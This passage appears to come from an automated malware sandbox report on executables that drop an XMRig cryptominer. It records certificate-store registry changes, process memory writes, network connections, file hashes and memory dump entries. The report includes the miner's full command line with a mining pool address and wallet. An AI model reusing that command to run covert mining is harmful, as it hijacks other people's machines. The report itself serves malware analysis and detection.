26c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1340 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 1340 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4956-14-0x0000023371C00000-0x0000023371C20000-memory.dmp

memory/4956-15-0x0000023371C40000-0x0000023371C60000-memory.dmp

memory/4956-16-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-19-0x0000023371C80000-0x0000023371CA0000-memory.dmp

memory/4956-18-0x0000023371C60000-0x0000023371C80000-memory.dmp

memory/4956-17-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-20-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-21-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-23-0x0000023371C80000-0x0000023371CA0000-memory.dmp

memory/4956-22-0x0000023371C60000-0x0000023371C80000-memory.dmp

memory/4956-24-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-25-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-26-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-27-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-28-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-29-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-30-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-31-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-32-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-33-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-34-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-35-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-36-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-37-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-38-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-39-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-40-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-41-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-42-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-43-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-44-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-45-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-46-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-47-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-48-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-49-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-50-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-51-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-52-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-53-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-54-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-55-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-56-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-57-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-58-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-59-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-60-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-61-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-62-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-63-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-64-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-65-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-66-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-67-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-68-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-69-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-70-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-71-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-72-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-73-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-74-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-75-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-76-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-77-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-78-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-79-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-80-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-81-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-82-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:30

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1805s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4888 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 4888 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
BE 2.17.107.98:443 www.bing.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 98.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2736-14-0x0000024BC7590000-0x0000024BC75B0000-memory.dmp

memory/2736-15-0x0000024BC75E0000-0x0000024BC7600000-memory.dmp

memory/2736-16-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-18-0x0000024BC7620000-0x0000024BC7640000-memory.dmp

memory/2736-17-0x0000024BC7600000-0x0000024BC7620000-memory.dmp

memory/2736-19-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-20-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-21-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-22-0x0000024BC7600000-0x0000024BC7620000-memory.dmp

memory/2736-23-0x0000024BC7620000-0x0000024BC7640000-memory.dmp

memory/2736-24-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-25-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-26-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-27-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-28-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-29-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-30-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-31-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-32-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-33-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-34-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-35-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-36-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-37-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-38-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-39-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-40-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-41-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-42-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-43-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-44-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-45-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-46-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-47-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-48-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-49-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-50-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-51-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-52-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-53-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-54-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-55-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-56-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-57-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-58-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-59-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-60-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-61-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-62-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-63-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-64-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-65-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-66-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-67-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-68-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-69-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-70-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-71-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-72-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

